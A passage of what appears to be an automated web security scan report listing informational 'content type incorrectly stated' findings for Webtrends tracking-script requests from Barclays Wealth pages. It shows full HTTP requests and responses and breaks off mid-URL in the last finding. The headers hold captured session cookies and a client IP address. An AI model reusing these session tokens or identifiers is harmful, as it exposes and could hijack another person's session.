28.42. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75d5010d692ad89ce20478fdda038aa0753f64b07ead19d11caf50cd75a632df77193a62612b5e7c9d6078da4a8476d3242d68e02f406c22e308b5e346da5b9638fb1fee0e12cc51afe6f31a01c4cbd5a0209f0efba58311bf558a07114d307f7f748fe32ef946716ffb97bd82703eb0392e758af6bce57844146ac2a00fb7ec24a886926fde5779c1ea94b83273b2c7a5f8ef6c0e3c72a73d7a7e6da98efae9ffee804345fa58b8e969a10047c915a7047da5b9c185a7a68d15ecc4fa1bef3ad3eb2387f16a034397f686bf0705876365c85e46a7284672840374716385395c0199f9fa5b728b6562a8729b36f124d2a6bb9e1eb37005d1610bb7cd7e496f310de1c06938c7510ae46c64c59a47ffbc10fcfa02bfa8ee7600e4b35b37ba7fc462c3900299c926f1e4fd768cba5f430f8c6a5fa5f8d31a2475371537b8bc2440c580257b4b71e1c0084e78e420c14ede5ef1b8501e7461bdbc8b69be53457201ab44ec22f0b2a34aa0ab77ccb8ef89d0a3665f559cc4381d6edbcc72131066e0ef09c53cb1c07f6fdd10beeccfe748bdaa7892a170cac0d7c323253596d5a9417803bbf18d04d047f76a34f89344cc71d1dca266a4e3ce70729955e4a588ac59251f141d6fd46fdb980e0a92d5fae78abd3f124873f3756deaf09139d660d5df01701329f9b2eb8bcb8ff0dc9156811860854926d97d5aac3facc2c62beed5d54daa84f95ee47c134ab9e097e266b27826980f2be9222a77974314710359444121312d58692f96e7c649295431cc87e0fa2e5923b286fd9272354a6f68690ac077cd2d574978183706b2b038bbc59e348da2a95fd19a2b150d07bedb78ab5c301e02bf2cbc78c8458a2cb43f573ad17988d3e3de312b4851cd610a86ffdba4ae5e76741d2ba2612b17449cbfb8327f7038007ed762e6eece45f89781111f33f9718bae687dcc8fa5796061423bf6a72a03f98b11405647a2a8e1e38c4afa54737ae44c999b6db129c631bfff68fc88e77af85217d3e1cdb826a30d15ffd6c542526342e3d010a004d236435539b15f6a98957250c716744a5117a33096396fc052a5ac8aabd02879d7cccd54daba1b9034dd07c281ba45a7350a00c0c9dd7e7293294c4f8e6a1ddbf4ba12a4587a660d0ff012505a3e84aa6e6f9854f6c63f7f2c5079d5a11f168d38715024afeab05e43102  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75d5010d692ad89ce20478fdda038aa0753f64b07ead19d11caf50cd75a632df77193a62612b5e7c9d6078da4a8476d3242d68e02f406c22e308b5e346da5b9638fb1fee0e12cc51afe6f31a01c4cbd5a0209f0efba58311bf558a07114d307f7f748fe32ef946716ffb97bd82703eb0392e758af6bce57844146ac2a00fb7ec24a886926fde5779c1ea94b83273b2c7a5f8ef6c0e3c72a73d7a7e6da98efae9ffee804345fa58b8e969a10047c915a7047da5b9c185a7a68d15ecc4fa1bef3ad3eb2387f16a034397f686bf0705876365c85e46a7284672840374716385395c0199f9fa5b728b6562a8729b36f124d2a6bb9e1eb37005d1610bb7cd7e496f310de1c06938c7510ae46c64c59a47ffbc10fcfa02bfa8ee7600e4b35b37ba7fc462c3900299c926f1e4fd768cba5f430f8c6a5fa5f8d31a2475371537b8bc2440c580257b4b71e1c0084e78e420c14ede5ef1b8501e7461bdbc8b69be53457201ab44ec22f0b2a34aa0ab77ccb8ef89d0a3665f559cc4381d6edbcc72131066e0ef09c53cb1c07f6fdd10beeccfe748bdaa7892a170cac0d7c323253596d5a9417803bbf18d04d047f76a34f89344cc71d1dca266a4e3ce70729955e4a588ac59251f141d6fd46fdb980e0a92d5fae78abd3f124873f3756deaf09139d660d5df01701329f9b2eb8bcb8ff0dc9156811860854926d97d5aac3facc2c62beed5d54daa84f95ee47c134ab9e097e266b27826980f2be9222a77974314710359444121312d58692f96e7c649295431cc87e0fa2e5923b286fd9272354a6f68690ac077cd2d574978183706b2b038bbc59e348da2a95fd19a2b150d07bedb78ab5c301e02bf2cbc78c8458a2cb43f573ad17988d3e3de312b4851cd610a86ffdba4ae5e76741d2ba2612b17449cbfb8327f7038007ed762e6eece45f89781111f33f9718bae687dcc8fa5796061423bf6a72a03f98b11405647a2a8e1e38c4afa54737ae44c999b6db129c631bfff68fc88e77af85217d3e1cdb826a30d15ffd6c542526342e3d010a004d236435539b15f6a98957250c716744a5117a33096396fc052a5ac8aabd02879d7cccd54daba1b9034dd07c281ba45a7350a00c0c9dd7e7293294c4f8e6a1ddbf4ba12a4587a660d0ff012505a3e84aa6e6f9854f6c63f7f2c5079d5a11f168d38715024afeab05e43102

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75d5010d692ad89ce20478fdda038aa0753f64b07ead19d11caf50cd75a632df77193a62612b5e7c9d6078da4a8476d3242d68e02f406c22e308b5e346da5b9638fb1fee0e12cc51afe6f31a01c4cbd5a0209f0efba58311bf558a07114d307f7f748fe32ef946716ffb97bd82703eb0392e758af6bce57844146ac2a00fb7ec24a886926fde5779c1ea94b83273b2c7a5f8ef6c0e3c72a73d7a7e6da98efae9ffee804345fa58b8e969a10047c915a7047da5b9c185a7a68d15ecc4fa1bef3ad3eb2387f16a034397f686bf0705876365c85e46a7284672840374716385395c0199f9fa5b728b6562a8729b36f124d2a6bb9e1eb37005d1610bb7cd7e496f310de1c06938c7510ae46c64c59a47ffbc10fcfa02bfa8ee7600e4b35b37ba7fc462c3900299c926f1e4fd768cba5f430f8c6a5fa5f8d31a2475371537b8bc2440c580257b4b71e1c0084e78e420c14ede5ef1b8501e7461bdbc8b69be53457201ab44ec22f0b2a34aa0ab77ccb8ef89d0a3665f559cc4381d6edbcc72131066e0ef09c53cb1c07f6fdd10beeccfe748bdaa7892a170cac0d7c323253596d5a9417803bbf18d04d047f76a34f89344cc71d1dca266a4e3ce70729955e4a588ac59251f141d6fd46fdb980e0a92d5fae78abd3f124873f3756deaf09139d660d5df01701329f9b2eb8bcb8ff0dc9156811860854926d97d5aac3facc2c62beed5d54daa84f95ee47c134ab9e097e266b27826980f2be9222a77974314710359444121312d58692f96e7c649295431cc87e0fa2e5923b286fd9272354a6f68690ac077cd2d574978183706b2b038bbc59e348da2a95fd19a2b150d07bedb78ab5c301e02bf2cbc78c8458a2cb43f573ad17988d3e3de312b4851cd610a86ffdba4ae5e76741d2ba2612b17449cbfb8327f7038007ed762e6eece45f89781111f33f9718bae687dcc8fa5796061423bf6a72a03f98b11405647a2a8e1e38c4afa54737ae44c999b6db129c631bfff68fc88e77af85217d3e1cdb826a30d15ffd6c542526342e3d010a004d236435539b15f6a98957250c716744a5117a33096396fc052a5ac8aabd02879d7cccd54daba1b9034dd07c281ba45a7350a00c0c9dd7e7293294c4f8e6a1ddbf4ba12a4587a660d0ff012505a3e84aa6e6f9854f6c63f7f2c5079d5a11f168d38715024afeab05e43102 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e932033a5f6d; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; Expires=Sun, 01-Jan-2012 00:02:11 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=030ea120; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200feed40; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.43. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75e4010c883f29dda6b0193c4ef67fb0912fa4b03e8dd8b40d2b455a54e7821f06486b72501acf4f0885cddaff2156f2d5adad553ea1ac27b31c311333ca1a47e8fb0aeb7e37a9e15f06133b60454ba4d766dfee1da533f35ec7b966610c010f2f054cd2afa88761deeaf7cbf4b2fec1687fa52935cd257806e69b32a03b566da5980642af3e6769f1fab519c223a2a7c4490f6c0e3d5247d86bde9ceacccbf88f5a21c2c09a38c9ed1941e797c935a3345970fca5b1b2774d756c14caba0b0ff4fb23a0f51e56179093f2a8d350e373328feb37070902c204a371316330fc89e1cd399b3ad39d8383eca7de72818567a76eefabc321e5a1517ef7dd8ebcbf314c90241f4b03351a216d1441dad65e4d469a2e766a297f5621b4b2ae170f5a84a73300d29cc8e68024f9c2e8caba07ab381baef3bed0d807376660c6b87910746493b15f8fb12415dd3af8f1d0e14e7a6ed5ad506e6434cdbcbbdccec645d291fb71fc02008282fb14bde3cdc99b9df5d757bf7559d4ddac4e7ac917c3004380ef7c857cb1d01f7adde5ebdc9f67080ddf58d2b1e5efc052a2029423c0e3ce776f178e65f8818406637ca22cb7344955c418920751b39e10720915a485cdadf9404a415daa24ff0e3d4faae2a5cfc7ea0d3af78d077315289ad5d13c53f540abb471578def215f9adb4f81cc100610d84145291229ed6ac95adcc263bb2e2481bc09574d7af19c12ea78f5b6a327b4bbb25c6aff1812eb47c6366124333924a1d4f4ed19e97b43e372285cd1257823f40b0ded3763f3bd0777f4df3f7d592f34073c88a76c086857e3c7d5184bb0ab019d02a90a91aa7ab45c014b8bed9bd023423f3  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75e4010c883f29dda6b0193c4ef67fb0912fa4b03e8dd8b40d2b455a54e7821f06486b72501acf4f0885cddaff2156f2d5adad553ea1ac27b31c311333ca1a47e8fb0aeb7e37a9e15f06133b60454ba4d766dfee1da533f35ec7b966610c010f2f054cd2afa88761deeaf7cbf4b2fec1687fa52935cd257806e69b32a03b566da5980642af3e6769f1fab519c223a2a7c4490f6c0e3d5247d86bde9ceacccbf88f5a21c2c09a38c9ed1941e797c935a3345970fca5b1b2774d756c14caba0b0ff4fb23a0f51e56179093f2a8d350e373328feb37070902c204a371316330fc89e1cd399b3ad39d8383eca7de72818567a76eefabc321e5a1517ef7dd8ebcbf314c90241f4b03351a216d1441dad65e4d469a2e766a297f5621b4b2ae170f5a84a73300d29cc8e68024f9c2e8caba07ab381baef3bed0d807376660c6b87910746493b15f8fb12415dd3af8f1d0e14e7a6ed5ad506e6434cdbcbbdccec645d291fb71fc02008282fb14bde3cdc99b9df5d757bf7559d4ddac4e7ac917c3004380ef7c857cb1d01f7adde5ebdc9f67080ddf58d2b1e5efc052a2029423c0e3ce776f178e65f8818406637ca22cb7344955c418920751b39e10720915a485cdadf9404a415daa24ff0e3d4faae2a5cfc7ea0d3af78d077315289ad5d13c53f540abb471578def215f9adb4f81cc100610d84145291229ed6ac95adcc263bb2e2481bc09574d7af19c12ea78f5b6a327b4bbb25c6aff1812eb47c6366124333924a1d4f4ed19e97b43e372285cd1257823f40b0ded3763f3bd0777f4df3f7d592f34073c88a76c086857e3c7d5184bb0ab019d02a90a91aa7ab45c014b8bed9bd023423f3

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75e4010c883f29dda6b0193c4ef67fb0912fa4b03e8dd8b40d2b455a54e7821f06486b72501acf4f0885cddaff2156f2d5adad553ea1ac27b31c311333ca1a47e8fb0aeb7e37a9e15f06133b60454ba4d766dfee1da533f35ec7b966610c010f2f054cd2afa88761deeaf7cbf4b2fec1687fa52935cd257806e69b32a03b566da5980642af3e6769f1fab519c223a2a7c4490f6c0e3d5247d86bde9ceacccbf88f5a21c2c09a38c9ed1941e797c935a3345970fca5b1b2774d756c14caba0b0ff4fb23a0f51e56179093f2a8d350e373328feb37070902c204a371316330fc89e1cd399b3ad39d8383eca7de72818567a76eefabc321e5a1517ef7dd8ebcbf314c90241f4b03351a216d1441dad65e4d469a2e766a297f5621b4b2ae170f5a84a73300d29cc8e68024f9c2e8caba07ab381baef3bed0d807376660c6b87910746493b15f8fb12415dd3af8f1d0e14e7a6ed5ad506e6434cdbcbbdccec645d291fb71fc02008282fb14bde3cdc99b9df5d757bf7559d4ddac4e7ac917c3004380ef7c857cb1d01f7adde5ebdc9f67080ddf58d2b1e5efc052a2029423c0e3ce776f178e65f8818406637ca22cb7344955c418920751b39e10720915a485cdadf9404a415daa24ff0e3d4faae2a5cfc7ea0d3af78d077315289ad5d13c53f540abb471578def215f9adb4f81cc100610d84145291229ed6ac95adcc263bb2e2481bc09574d7af19c12ea78f5b6a327b4bbb25c6aff1812eb47c6366124333924a1d4f4ed19e97b43e372285cd1257823f40b0ded3763f3bd0777f4df3f7d592f34073c88a76c086857e3c7d5184bb0ab019d02a90a91aa7ab45c014b8bed9bd023423f3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e932047ca940; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=8E98275AEA21D3A7C00E2C03B5E15653; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0561583b; Expires=Sun, 01-Jan-2012 00:02:07 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=0008fc39; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93203169299; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.44. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bbb079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff26af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a7f84ff07952fa48a017e306b1ebe7897fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bbb079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff2